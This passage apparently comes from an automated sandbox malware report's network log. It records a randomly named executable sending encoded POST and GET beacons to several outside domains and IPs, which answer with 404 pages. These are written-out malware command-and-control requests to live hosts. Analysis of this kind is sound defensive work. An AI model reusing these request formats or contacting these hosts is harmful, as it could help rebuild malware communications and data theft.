                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.549991103.21.221.4801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:10.113691092 CET1759OUTPOST /4iun/ HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.tempatmudisini06.click
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.tempatmudisini06.click/4iun/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 51 65 42 6e 4d 45 64 4a 49 4a 33 78 58 68 68 42 69 32 37 77 6a 6b 48 47 57 59 43 34 79 4a 4c 49 46 6a 48 68 39 62 4e 49 6d 31 79 6a 2b 4f 6a 32 65 34 47 44 53 42 57 36 31 33 35 49 70 41 4c 77 36 48 77 43 36 43 55 59 35 64 61 4a 62 4d 4e 53 65 4a 71 34 6e 5a 71 62 74 39 79 7a 75 6b 76 54 54 4e 68 6c 79 6e 4e 6c 30 55 44 76 62 4d 7a 62 35 46 7a 2f 55 6e 57 6e 75 37 4e 49 36 38 49 54 30 32 53 65 32 33 41 34 31 4f 31 4c 6c 30 36 59 63 2f 31 49 71 6e 58 59 30 6d 39 42 4d 42 5a 73 32 6c 32 52 79 56 61 78 69 4b 72 49 31 71 78 61 48 33 53 49 71 48 36 76 75 48 4f 52 4a 35 77 46 4c 42 61 6d 73 39 42 45 52 48 35 72 34 4e 72 42 7a 6e 4c 33 54 69 2f 6b 63 6e 54 71 38 31 4f 57 6b 46 4a 76 4f 4d 59 4b 4b 59 52 39 68 61 51 34 4b 71 6d 71 6b 6d 34 66 72 4c 38 41 5a 35 51 75 37 38 35 37 76 55 38 33 76 6a 45 6e 37 64 54 6f 62 52 7a 69 56 2f 49 76 77 2b 6f 44 52 31 2b 6b 64 58 43 78 4b 63 6a 34 53 41 35 42 76 58 38 33 79 33 33 4c 4c 4b 7a 5a 75 47 68 77 59 4e 4a 79 [TRUNCATED]
                                                                  Data Ascii: e6sH8=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJLIFjHh9bNIm1yj+Oj2e4GDSBW6135IpALw6HwC6CUY5daJbMNSeJq4nZqbt9yzukvTTNhlynNl0UDvbMzb5Fz/UnWnu7NI68IT02Se23A41O1Ll06Yc/1IqnXY0m9BMBZs2l2RyVaxiKrI1qxaH3SIqH6vuHORJ5wFLBams9BERH5r4NrBznL3Ti/kcnTq81OWkFJvOMYKKYR9haQ4Kqmqkm4frL8AZ5Qu7857vU83vjEn7dTobRziV/Ivw+oDR1+kdXCxKcj4SA5BvX83y33LLKzZuGhwYNJyhlWtTGWh1iuJOsqkL0FKt+Fhu+P0jH9O2wLS9ZyjecKDMcJSAUS3zDARgbvANShTUbK0kkQ/Ybc0nzX8P+7AiXYoxNmEgDaCdjI2FOzPiwK9SAhyhbrliaVBIRAImpTbc8YxG90k9IE/YUFK6HGGcv5kA6F6odlI5GPHc0sHTePd9L/7hkGtnSk7q2h3lPpoMJKEIrPijAb2Ro1FoYbsdfcwgvmlMzzwr7SBHZGf5Mpj4ghuz6HGJIcNg+ALJ9JcXjcUIXSKtAZOZK6Ag9UAlgz+RyGd0oC7QUqZhsPFRnwcb2a9ARnDxJJarNK/Gs+t1eOccONQOVBcQLrcXKbbolvI+05tRzs9B1JYoAha6UruF37pWD8TLZ8ojExfgUcezjXNWEwMfa9u+rH2Cxbi2iXlF24M1Oaa8fRq2wqGdt0hPv2kKnd3rL0tODzGwzuYagPnFLFij2yeKoivTvEzivXA50YqdHpwiihLzHSu7h9QdvRQpuJnNPsguaGkl8lFr9b+juKyBwGLXTHvipEYJhlFekKi/jwA8y8xr5EBFa7+wxyQMRxhVU+hQnAYxq+jqbDHtHoX4e2zbYUkdzjL+AzS/YkOchjYpurjmp7yHFR1wZJa2AjOOLU3gu9nU/SvqtUDNUNPyg/C5XBVa2Xm9hqnn3CRddLFfO [TRUNCATED]
                                                                  Jan 11, 2025 01:22:11.009907007 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:10 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.549992103.21.221.4801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:12.652364969 CET443OUTGET /4iun/?rr=BbldmNsp8&e6sH8=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpuauCK8BCe9zqr6jRwciKumWtZPYXukZtwjz9MdHPx1eFIw== HTTP/1.1
                                                                  Host: www.tempatmudisini06.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:13.564148903 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Sat, 11 Jan 2025 00:22:13 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.549993154.23.184.95801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:18.671633959 CET683OUTPOST /lazq/ HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.hm35s.top
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.hm35s.top/lazq/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6d 70 4f 6e 33 43 42 70 6b 37 34 5a 46 6f 63 34 65 67 51 59 49 67 53 63 4b 68 47 4b 48 72 47 33 69 55 48 4b 62 39 36 57 68 6b 39 75 45 61 59 52 4c 68 78 2f 46 46 70 4c 37 38 66 66 64 41 43 77 72 2b 5a 78 79 62 38 62 62 6a 4c 4d 51 30 58 39 31 49 69 5a 49 6a 68 61 49 62 4d 69 4e 6d 55 43 2b 64 30 52 59 49 72 2f 4c 78 66 53 54 74 5a 37 79 70 72 54 6e 48 67 61 4e 50 6c 49 32 33 65 52 46 58 4f 46 71 4a 6c 58 61 43 70 41 79 4d 4c 73 64 44 71 42 48 69 2b 69 46 65 70 5a 75 71 31 6c 45 71 4a 73 31 37 36 34 77 32 6d 7a 74 55 32 33 31 59 66 34 6f 57 76 69 78 6b 45 3d
                                                                  Data Ascii: e6sH8=bv8vV/gVAlzxmpOn3CBpk74ZFoc4egQYIgScKhGKHrG3iUHKb96Whk9uEaYRLhx/FFpL78ffdACwr+Zxyb8bbjLMQ0X91IiZIjhaIbMiNmUC+d0RYIr/LxfSTtZ7yprTnHgaNPlI23eRFXOFqJlXaCpAyMLsdDqBHi+iFepZuq1lEqJs1764w2mztU231Yf4oWvixkE=
                                                                  Jan 11, 2025 01:22:19.565133095 CET312INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:19 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.549994154.23.184.95801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:21.223113060 CET703OUTPOST /lazq/ HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.hm35s.top
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.hm35s.top/lazq/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6e 4a 65 6e 34 42 5a 70 7a 72 34 61 41 6f 63 34 48 51 52 52 49 67 65 63 4b 67 79 6b 48 5a 53 33 6a 31 33 4b 61 34 4f 57 67 6b 39 75 4c 4b 59 51 50 68 78 43 46 46 56 44 37 2b 4c 66 64 41 6d 77 72 2f 70 78 79 71 38 59 61 7a 4c 4f 62 55 58 37 34 6f 69 5a 49 6a 68 61 49 62 70 46 4e 6d 4d 43 2f 74 6b 52 4a 63 48 34 49 78 66 56 55 74 5a 37 32 70 72 70 6e 48 67 43 4e 4f 35 75 32 31 6d 52 46 53 71 46 71 59 6c 57 44 53 70 38 76 63 4b 73 64 7a 72 53 48 51 43 4a 46 66 73 6c 78 70 4a 45 46 63 34 47 76 5a 79 51 6a 57 4b 4c 39 48 2b 41 6b 6f 2b 52 79 31 2f 53 76 7a 53 78 6b 56 30 30 47 30 72 54 41 5a 7a 43 6f 31 67 71 61 7a 58 67
                                                                  Data Ascii: e6sH8=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHZS3j13Ka4OWgk9uLKYQPhxCFFVD7+LfdAmwr/pxyq8YazLObUX74oiZIjhaIbpFNmMC/tkRJcH4IxfVUtZ72prpnHgCNO5u21mRFSqFqYlWDSp8vcKsdzrSHQCJFfslxpJEFc4GvZyQjWKL9H+Ako+Ry1/SvzSxkV00G0rTAZzCo1gqazXg
                                                                  Jan 11, 2025 01:22:22.100507021 CET312INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:21 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.549995154.23.184.95801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:23.765350103 CET1720OUTPOST /lazq/ HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.hm35s.top
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.hm35s.top/lazq/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6e 4a 65 6e 34 42 5a 70 7a 72 34 61 41 6f 63 34 48 51 52 52 49 67 65 63 4b 67 79 6b 48 59 71 33 6a 48 50 4b 56 2f 69 57 6e 6b 39 75 4e 36 59 56 50 68 78 54 46 46 39 48 37 2b 47 6b 64 43 75 77 72 5a 39 78 35 34 55 59 51 7a 4c 4f 55 30 58 2b 31 49 69 51 49 6a 51 54 49 62 35 46 4e 6d 4d 43 2f 72 41 52 5a 34 72 34 45 52 66 53 54 74 5a 33 79 70 71 47 6e 48 59 38 4e 50 4e 59 32 45 47 52 46 79 61 46 6f 71 39 57 4c 53 70 45 38 73 4b 43 64 7a 6d 4b 48 55 69 76 46 66 49 62 78 70 68 45 49 74 4a 66 71 64 6d 34 38 6c 65 45 79 55 36 6d 39 76 4c 31 33 56 72 68 79 6b 75 6f 76 33 63 35 52 54 4c 4b 45 64 32 4e 70 6a 38 66 66 44 43 4c 42 55 58 67 41 71 34 77 78 44 32 63 43 64 77 55 47 77 2b 4a 5a 75 4a 65 76 6f 35 51 78 7a 54 6a 62 41 79 48 4f 48 75 35 77 76 68 6e 37 53 70 77 45 73 34 42 50 2f 2b 74 71 58 2f 71 2f 42 55 58 6e 49 77 33 75 4c 36 6b 36 33 74 30 63 31 78 47 50 70 36 79 39 2b 4d 43 4b 6c 70 6f 64 36 77 48 53 66 6e 71 4a 61 70 72 67 51 6a 43 34 72 36 52 [TRUNCATED]
                                                                  Data Ascii: e6sH8=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHYq3jHPKV/iWnk9uN6YVPhxTFF9H7+GkdCuwrZ9x54UYQzLOU0X+1IiQIjQTIb5FNmMC/rARZ4r4ERfSTtZ3ypqGnHY8NPNY2EGRFyaFoq9WLSpE8sKCdzmKHUivFfIbxphEItJfqdm48leEyU6m9vL13Vrhykuov3c5RTLKEd2Npj8ffDCLBUXgAq4wxD2cCdwUGw+JZuJevo5QxzTjbAyHOHu5wvhn7SpwEs4BP/+tqX/q/BUXnIw3uL6k63t0c1xGPp6y9+MCKlpod6wHSfnqJaprgQjC4r6RVgdZ4Zb01QzE2b4ZZrcYtHlKovYQdMYj/YtEMsmPqwRZpLB1sHPpYNUJ5OgUY9IbV0gpnIHWxudlI1OAABqFh2CiCH9z6T/m5t3z6z102KZsK1YXzy6xn+cWCR7nfH3vcUshmYG+9qRsXam0yv7KwYwiMFjEvuWygfYDjvnDDsmGmbrNfXoSgOaRB5jQ4qDHCeEFKP1VvCcPG6YQPjki257gvflw8PhvUEYc+XgQlt1CMiwepYfkRLAYUeXui3U2SfHEQG5XrYf4I3dzdTWSSRZoOBGEur1UqEsV8e7bSECVajEsiYMavVGpzdp5VBRpwviyfEip0Wrjy/3HaUKAmQlmmP88KCMgKSJI2DjLwgT9hTzql/uVkw4UGJRHo3Gwifq9DDg5rj+d/UDUdgtnyvLcFc3nQ9PgKIJNeQSZlLEv1CAu5sssQyfHrmZ6G5fQWYC5/vl9+CFMFzCWchIkYrFYhALhQBWCrS/tGxjxh3m0pJjtwxuvngpjz5zSima02ZEMIsM1eq7uz9DYUu14VGce45iLdGhjT37M3RZw3I5HSZSP5udn9X1pvlZoUHpH7Mpcf8daDwjv5pP1POtCLie8Aku/IR4prXIlh/4nPYzn6WR7n8i6HZQylbErOQlcHz3zXQ4e0YniBW3fzG3VGWKXTMim0GMH7l [TRUNCATED]
                                                                  Jan 11, 2025 01:22:24.662247896 CET312INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:24 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.549996154.23.184.95801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:26.306927919 CET430OUTGET /lazq/?e6sH8=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVVX0RGb+5s2kSkhaf40FF0423J1jVorSDRX3Mt1+1Y+N0g==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.hm35s.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:27.188520908 CET312INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 00:22:27 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 148
                                                                  Connection: close
                                                                  ETag: "66a5f968-94"
                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.54999788.198.8.150801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:32.274576902 CET710OUTPOST /2lci/ HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.snehasfashion.shop
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.snehasfashion.shop/2lci/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
